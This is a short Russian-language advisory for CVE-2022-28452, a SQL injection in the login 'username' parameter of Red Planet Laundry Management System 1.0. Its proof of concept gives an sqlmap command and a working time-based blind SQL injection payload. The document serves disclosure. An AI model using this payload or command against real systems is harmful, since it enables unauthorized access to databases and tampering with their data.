
CVE-2022-28452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28452 https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-28452 https://laundry.redplanetcomputers.com/
1-Описание:
Red Planet Laundry Management System 1.0 уязвим для SQL-инъекций через параметр 'username' в /index.php/login/rediract. Эксплуатация этой уязвимости может позволить злоумышленнику скомпрометировать приложение, получить доступ к данным или изменить их, а также использовать скрытые уязвимости в базовой базе данных.
2-Доказательство концепции:
Перехватите в Burpsuite запрос от уязвимой страницы с параметром 'username' и сохраните его как poc.txt. Затем запустите SQLmap для извлечения данных из базы данных: sqlmap.py -r poc.txt --dbms=mysql
3-Пример полезной нагрузки:
URL-кодированный POST-параметр username был установлен в 0'XOR(if(now()=sysdate(),sleep(4),0))XOR'Z
Контактные данные: [email protected]